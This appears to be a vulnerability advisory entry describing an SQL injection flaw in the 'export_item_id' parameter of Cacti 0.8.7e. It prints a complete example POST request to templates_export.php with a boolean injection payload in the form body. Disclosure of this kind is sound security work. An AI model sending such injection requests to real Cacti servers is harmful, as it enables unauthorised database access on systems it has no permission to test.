|
|
Cacti 'export_item_id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example request is available: POST /cacti-0.8.7e/templates_export.php HTTP/1.1 Host: www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://www.example.com7/cacti-0.8.7e/templates_export.php Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e Content-Type: application/x-www-form-urlencoded Content-Length: 130 export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12 |
|
Privacy Statement |